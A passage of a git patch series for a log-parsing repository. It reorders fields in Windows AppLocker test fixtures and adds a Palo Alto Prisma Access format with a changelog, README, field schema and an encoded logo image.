+        "Domain": "DOM",
+        "EventType": "INFO",
+        "Keywords": "4611686018427388000",
+        "OpcodeValue": 0,
+        "ProviderGuid": "{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}",
+        "Severity": "INFO",
+        "SourceName": "Microsoft-Windows-AppLocker",
+        "Task": 0
+      },
+      "record_id": 16535331,
+      "type": "Microsoft-Windows-AppLocker/MSI and Script"
+    },
+    "file": {
+      "name": "file.test",
+      "path": "%OSDRIVE%\\USERS\\ACCOUNT\\APPDATA\\LOCAL\\TEMP\\file.test"
+    },
+    "host": {
+      "hostname": "FOOBAR",
+      "name": "FOOBAR"
+    },
+    "log": {
+      "hostname": "FOOBAR",
+      "level": "info"
+    },
+    "os": {
+      "family": "windows",
+      "platform": "windows"
+    },
+    "process": {
+      "id": 5532,
+      "pid": 5532,
+      "thread": {
+        "id": 10772
+      }
+    },
+    "related": {
+      "hosts": [
+        "FOOBAR"
+      ],
+      "user": [
+        "account"
+      ]
+    },
+    "user": {
+      "domain": "DOM",
+      "id": "S-1-2-34",
+      "name": "account"
+    }
+  }
+}
\ No newline at end of file

From 6ba21b9d44f79bd521d7c8842fb28ba183e64de6 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 17:46:48 +0200
Subject: [PATCH 152/317] Fix on linting

---
 Windows/windows/tests/process_8002.json | 4 ++--
 Windows/windows/tests/process_8005.json | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/Windows/windows/tests/process_8002.json b/Windows/windows/tests/process_8002.json
index 2fa32d712..9d3781a25 100644
--- a/Windows/windows/tests/process_8002.json
+++ b/Windows/windows/tests/process_8002.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Windows",
         "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
       }
-    },
-    "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+    }
   },
   "expected": {
     "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
diff --git a/Windows/windows/tests/process_8005.json b/Windows/windows/tests/process_8005.json
index 6b0b66287..9a38f9033 100644
--- a/Windows/windows/tests/process_8005.json
+++ b/Windows/windows/tests/process_8005.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Windows",
         "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
       }
-    },
-    "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+    }
   },
   "expected": {
     "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",

From cf2fbfe87de71abe17b20efe6037b03d934c3700 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 8 Oct 2024 12:38:25 +0200
Subject: [PATCH 153/317] feat(PaloAlto): add Palo Alto Prisma Access format

---
 .../paloalto-prima-access/CHANGELOG.md        |  14 +
 .../paloalto-prima-access/README.md           |   5 +
 .../paloalto-prima-access/_meta/fields.yml    | 309 ++++++
 .../paloalto-prima-access/_meta/logo.png      | Bin 0 -> 13410 bytes
 .../paloalto-prima-access/_meta/manifest.yml  |  12 +
 .../_meta/smart-descriptions.json             | 721 ++++++++++++++
 .../paloalto-prima-access/ingest/parser.yml   | 880 ++++++++++++++++++
 .../tests/User_id_1_csv.json                  |  59 ++
 .../tests/User_id_2_csv.json                  |  59 ++
 .../paloalto-prima-access/tests/auth_cef.json |  76 ++
 .../tests/decryption_cef.json                 |  97 ++
 .../paloalto-prima-access/tests/file_cef.json |  97 ++
 .../tests/fix_bug_with_int.json               |  93 ++
 .../tests/fix_bug_without_int.json            |  91 ++
 .../tests/globalprotect_cef.json              |  73 ++
 .../tests/globalprotect_csv.json              |  72 ++
 .../tests/globalprotect_csv_2.json            |  74 ++
 .../tests/hip_match_cef.json                  |  72 ++
 .../tests/icmp_allow_csv.json                 |  77 ++
 .../tests/iptag_cef.json                      |  59 ++
 .../tests/network_threat_alert_1.json         | 106 +++
 .../tests/network_threat_alert_2.json         | 128 +++
 .../paloalto-prima-access/tests/sctp_cef.json |  91 ++
 .../tests/system_csv.json                     |  56 ++
 .../tests/tcp_allow_csv.json                  |  77 ++
 .../tests/test_cloud_election_json.json       |  55 ++
 .../tests/test_dhcp_renew_json.json           |  56 ++
 .../tests/test_dns_proxy_json.json            |  39 +
 .../tests/test_dns_response.json              |  67 ++
 .../tests/test_file_alert_json.json           | 105 +++
 .../tests/test_globalprotect.json             |  77 ++
 .../tests/test_installed_package_json.json    |  43 +
 .../tests/test_ldap_brute_force.json          |  89 ++
 .../tests/test_new_file_type.json             | 106 +++
 .../tests/test_new_globalprotect.json         |  73 ++
 .../tests/test_new_threat_type.json           |  93 ++
 .../tests/test_new_url_type.json              | 111 +++
 .../tests/test_ntp_sync_json.json             |  42 +
 .../tests/test_port_up_json.json              |  46 +
 .../tests/test_registration_succeed_json.json |  51 +
 .../tests/test_system.json                    |  41 +
 .../tests/test_system_event_10_json.json      |  49 +
 .../tests/test_system_event_11_json.json      |  40 +
 .../tests/test_system_event_12_json.json      |  56 ++
 .../tests/test_system_event_1_json.json       |  43 +
 .../tests/test_system_event_2_json.json       |  40 +
 .../tests/test_system_event_3_json.json       |  48 +
 .../tests/test_system_event_4_json.json       |  40 +
 .../tests/test_system_event_5_json.json       |  40 +
 .../tests/test_system_event_6_json.json       |  40 +
 .../tests/test_system_event_7_json.json       |  51 +
 .../tests/test_system_event_8_json.json       |  43 +
 .../tests/test_system_event_9_json.json       |  40 +
 .../tests/test_threat.json                    |  94 ++
 .../tests/test_threat_02.json                 |  91 ++
 .../tests/test_timestamp_palo.json            |  41 +
 .../tests/test_traffic_event_1_json.json      |  87 ++
 .../tests/test_traffic_event_2_json.json      |  87 ++
 .../tests/test_update_content_json.json       |  47 +
 .../tests/test_upgrade_package_json.json      |  47 +
 .../tests/test_user_authentication_json.json  |  54 ++
 .../tests/test_userid.json                    |  60 ++
 .../tests/test_web_authentication_json.json   |  57 ++
 .../tests/test_wildfire_failure_json.json     |  52 ++
 .../tests/threat-url-xff.json                 | 109 +++
 .../tests/threat_cef.json                     | 128 +++
 .../tests/threat_csv.json                     |  85 ++
 .../tests/traffic1_csv.json                   | 108 +++
 .../tests/traffic2_csv.json                   | 112 +++
 .../tests/traffic_cef.json                    | 142 +++
 .../tests/traffic_with_resotimestamp.json     |  78 ++
 .../tests/udp_deny_csv.json                   |  78 ++
 .../paloalto-prima-access/tests/url_cef.json  | 135 +++
 .../tests/userid_cef.json                     |  77 ++
 .../tests/wildfire1_json.json                 | 111 +++
 75 files changed, 6902 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prima-access/CHANGELOG.md
 create mode 100644 Palo Alto Networks/paloalto-prima-access/README.md
 create mode 100644 Palo Alto Networks/paloalto-prima-access/_meta/fields.yml
 create mode 100644 Palo Alto Networks/paloalto-prima-access/_meta/logo.png
 create mode 100644 Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml
 create mode 100644 Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/ingest/parser.yml
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/file_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/system_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_threat.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_userid.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/url_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json
 create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json

diff --git a/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md b/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md
new file mode 100644
index 000000000..97e0142f2
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md	
@@ -0,0 +1,14 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
+
+## 2024-10-08
+
+### Added
+
+- Creation of the format
diff --git a/Palo Alto Networks/paloalto-prima-access/README.md b/Palo Alto Networks/paloalto-prima-access/README.md
new file mode 100644
index 000000000..40e67c767
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/README.md	
@@ -0,0 +1,5 @@
+# Palo Alto Networks
+
+## Description
+
+Field and log example https://docs.paloaltonetworks.com/cortex/cortex-data-lake/log-forwarding-schema-reference/network-logs
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml
new file mode 100644
index 000000000..7c526334c
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml	
@@ -0,0 +1,309 @@
+email.from.address:
+  description: Email address from
+  name: email.from.address
+  type: keyword
+
+email.subject:
+  description: Subject
+  name: email.subject
+  type: keyword
+
+email.to.address:
+  description: Email address to
+  name: email.to.address
+  type: keyword
+
+paloalto:
+  description: Root of paloalto custom fields
+  name: paloalto
+  type: dict
+
+paloalto.ContentType:
+  description: Paloalto content type
+  name: paloalto.ContentType
+  type: keyword
+
+paloalto.DGHierarchyLevel1:
+  description: "A sequence of identification numbers that indicate the device group\u2019\
+    s location within a device group hierarchy"
+  name: paloalto.DGHierarchyLevel1
+  type: keyword
+
+paloalto.DGHierarchyLevel2:
+  description: "A sequence of identification numbers that indicate the device group\u2019\
+    s location within a device group hierarchy"
+  name: paloalto.DGHierarchyLevel2
+  type: keyword
+
+paloalto.DGHierarchyLevel3:
+  description: "A sequence of identification numbers that indicate the device group\u2019\
+    s location within a device group hierarchy"
+  name: paloalto.DGHierarchyLevel3
+  type: keyword
+
+paloalto.DGHierarchyLevel4:
+  description: "A sequence of identification numbers that indicate the device group\u2019\
+    s location within a device group hierarchy"
+  name: paloalto.DGHierarchyLevel4
+  type: keyword
+
+paloalto.DirectionOfAttack:
+  description: Attack direction
+  name: paloalto.DirectionOfAttack
+  type: keyword
+
+paloalto.EventID:
+  description: Type of the event
+  name: paloalto.EventID
+  type: keyword
+
+paloalto.PanOSContainerName:
+  description: ''
+  name: paloalto.PanOSContainerName
+  type: keyword
+
+paloalto.PanOSContainerNameSpace:
+  description: ''
+  name: paloalto.PanOSContainerNameSpace
+  type: keyword
+
+paloalto.PanOSDestinationDeviceCategory:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceCategory
+  type: keyword
+
+paloalto.PanOSDestinationDeviceHost:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceHost
+  type: keyword
+
+paloalto.PanOSDestinationDeviceMac:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceMac
+  type: keyword
+
+paloalto.PanOSDestinationDeviceModel:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceModel
+  type: keyword
+
+paloalto.PanOSDestinationDeviceOSFamily:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceOSFamily
+  type: keyword
+
+paloalto.PanOSDestinationDeviceOSVersion:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceOSVersion
+  type: keyword
+
+paloalto.PanOSDestinationDeviceProfile:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceProfile
+  type: keyword
+
+paloalto.PanOSDestinationDeviceVendor:
+  description: ''
+  name: paloalto.PanOSDestinationDeviceVendor
+  type: keyword
+
+paloalto.PanOSDestinationEDL:
+  description: ''
+  name: paloalto.PanOSDestinationEDL
+  type: keyword
+
+paloalto.PanOSDestinationUUID:
+  description: ''
+  name: paloalto.PanOSDestinationUUID
+  type: keyword
+
+paloalto.PanOSEndpointSerialNumber:
+  description: PanOS Endpoint Serial Number
+  name: paloalto.PanOSEndpointSerialNumber
+  type: keyword
+
+paloalto.PanOSGPHostID:
+  description: ''
+  name: paloalto.PanOSGPHostID
+  type: keyword
+
+paloalto.PanOSHASessionOwner:
+  description: ''
+  name: paloalto.PanOSHASessionOwner
+  type: keyword
+
+paloalto.PanOSQuarantineReason:
+  description: Quarantine reason
+  name: paloalto.PanOSQuarantineReason
+  type: keyword
+
+paloalto.PanOSSDWANCluster:
+  description: ''
+  name: paloalto.PanOSSDWANCluster
+  type: keyword
+
+paloalto.PanOSSDWANClusterType:
+  description: ''
+  name: paloalto.PanOSSDWANClusterType
+  type: keyword
+
+paloalto.PanOSSDWANDeviceType:
+  description: ''
+  name: paloalto.PanOSSDWANDeviceType
+  type: keyword
+
+paloalto.PanOSSDWANPolicyName:
+  description: ''
+  name: paloalto.PanOSSDWANPolicyName
+  type: keyword
+
+paloalto.PanOSSDWANSite:
+  description: ''
+  name: paloalto.PanOSSDWANSite
+  type: keyword
+
+paloalto.PanOSSessionStartTime:
+  description: ''
+  name: paloalto.PanOSSessionStartTime
+  type: keyword
+
+paloalto.PanOSSourceDeviceHost:
+  description: ''
+  name: paloalto.PanOSSourceDeviceHost
+  type: keyword
+
+paloalto.PanOSSourceDeviceModel:
+  description: ''
+  name: paloalto.PanOSSourceDeviceModel
+  type: keyword
+
+paloalto.PanOSSourceDeviceProfile:
+  description: ''
+  name: paloalto.PanOSSourceDeviceProfile
+  type: keyword
+
+paloalto.PanOSSourceDeviceVendor:
+  description: ''
+  name: paloalto.PanOSSourceDeviceVendor
+  type: keyword
+
+paloalto.PanOSSourceDynamicAddressGroup:
+  description: ''
+  name: paloalto.PanOSSourceDynamicAddressGroup
+  type: keyword
+
+paloalto.PanOSSourceEDL:
+  description: ''
+  name: paloalto.PanOSSourceEDL
+  type: keyword
+
+paloalto.PanOSSourceLocation:
+  description: ''
+  name: paloalto.PanOSSourceLocation
+  type: keyword
+
+paloalto.PanOSSourceUUID:
+  description: ''
+  name: paloalto.PanOSSourceUUID
+  type: keyword
+
+paloalto.PanOSThreatCategory:
+  description: PanOS associated threat category
+  name: paloalto.PanOSThreatCategory
+  type: keyword
+
+paloalto.PanOSThreatID:
+  description: PanOS associated threat ID (e.g. Microsoft Windows NTLMSSP Detection(92322))
+  name: paloalto.PanOSThreatID
+  type: keyword
+
+paloalto.PanOSVirtualSystemName:
+  description: ''
+  name: paloalto.PanOSVirtualSystemName
+  type: keyword
+
+paloalto.PanOSX-Forwarded-ForIP:
+  description: ''
+  name: paloalto.PanOSX-Forwarded-ForIP
+  type: keyword
+
+paloalto.Threat_ContentType:
+  description: Type associated with the threat
+  name: paloalto.Threat_ContentType
+  type: keyword
+
+paloalto.URLCategory:
+  description: ''
+  name: paloalto.URLCategory
+  type: keyword
+
+paloalto.VirtualLocation:
+  description: String representation of the unique identifier for a virtual system
+    on a Palo Alto Networks firewall
+  name: paloalto.VirtualLocation
+  type: keyword
+
+paloalto.VirtualSystemID:
+  description: A unique identifier for a virtual system on a Palo Alto Networks firewall
+  name: paloalto.VirtualSystemID
+  type: keyword
+
+paloalto.VirtualSystemName:
+  description: The name of the virtual system associated with the network traffic
+  name: paloalto.VirtualSystemName
+  type: keyword
+
+paloalto.authentication.method:
+  description: The authentication method for the GlobalProtect connection
+  name: paloalto.authentication.method
+  type: keyword
+
+paloalto.connection.method:
+  description: Identifies how the GlobalProtect app connected to the the Gateway
+  name: paloalto.connection.method
+  type: keyword
+
+paloalto.connection.stage:
+  description: The stage of the GlobalProtect connection
+  name: paloalto.connection.stage
+  type: keyword
+
+paloalto.dns.category:
+  description: Classify DNS requests in terms of security or relevance
+  name: paloalto.dns.category
+  type: keyword
+
+paloalto.endpoint.serial_number:
+  description: Unique device identifier
+  name: paloalto.endpoint.serial_number
+  type: keyword
+
+paloalto.source.private.ip:
+  description: Private IP address
+  name: paloalto.source.private.ip
+  type: keyword
+
+paloalto.source.region:
+  description: IP address range
+  name: paloalto.source.region
+  type: keyword
+
+paloalto.threat.category:
+  description: Threat Category
+  name: paloalto.threat.category
+  type: keyword
+
+paloalto.threat.id:
+  description: The identifier of the threat
+  name: paloalto.threat.id
+  type: keyword
+
+paloalto.threat.name:
+  description: The name of the threat
+  name: paloalto.threat.name
+  type: keyword
+
+paloalto.threat.type:
+  description: The type of the threat
+  name: paloalto.threat.type
+  type: keyword
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/logo.png b/Palo Alto Networks/paloalto-prima-access/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..344ec7ecd5bb31a7e641101881f5767a5ecb4a1a
GIT binary patch
literal 13410
zcmd6O^;etE6K-%Q6nAg2;!xbZ6mM~NcXx;4(n4`daVb*VUD{&7-5~^r5(osl`F!sm
zaql^Ak{@!;?C!HO&pbOjZ~P~9#n-PWUjYDs*GeDdH4(oL|9vpg5#K*Ocgq0)epV%U
z8EyakvyFi8?;|-<mls+$y&;p{uzZ|%zugnaXn`MOh8g@ltM-`RzN#co^&hd<ZTjQf
z$eiok4Inwtls5k$bE#Zxu%VK^Wtk*{-?49Ne%_P{s|^edn`p2|eycdWCNXz&&quIX
z{P5(fBcbEg6K+8s^Z(?zn(WPfFWRuT*=R08Kf6I%?;g;xEL6jhHLhrM<f<ZA;w?m<
z_fwp9M=OT7h!pB!ZKiU<QqfDZmUAxX)4DKZPDXulVV14sUhchDw6DDwrVOa)GFkZ@
zy}|GzfV@-q<r_iAYz}jT=|p3s=MDQv;%YTW%`KGnbxk?r`j*d4txRnli11?V88o*u
z;&U>)(dztNK<<xsHF=EvMcVJmL16m=9i}nc)3aBwj8pFXbB*73v{crMm@Smln1ywA
zaS&;5o@{7P^*;>sp;yK=#9KpJuVS?U?>Af~1k3F%tlbKdKlYjKTqi#LBUSQ7it-YB
z=2nOnP_{BvWyyq9C7pc`I@;0Ghz$vLI;U4$(L%H6v`q0{x5ohv5NaP~MX-cm!<^}*
z%UXUJ3`h46_4o+Bm4ol6{%yJ=4d)u(io^xb$EYAX8LM4eiuM+Zp@!agFFzf7VJM9Y
zB@fK;dp&2lzDEa{s~Bd^^Iz8o9ZU9YhqOC5IA<RD4vndP=Ea%01@7s}c+X@-;Q~|}
z$c0x3#W~+06SbMr9p|L9mj6ArXi%Z@!cZO;Qv2F_#f}(oSh{!bpAYF3&EYL8#UNM`
z8hx}PHt=!_5iBR#lSMzIKJ8=aXBwn@ox2B59}nWNul-kDTlH_#Uf+(I=tyxjcS=^n
zhve1KwjY^X$!Ei6ZT!jKCdROws#!m->%?431Z2PC$G}BdZdRTBLKrjv@&<mZO2F2s
z3Y=NjjPCdg7gTPd#G)YBxV<l0LLtKKGn@)BdDMtX%|{xv-kP(R?zz8{Ps>%E6R#IY
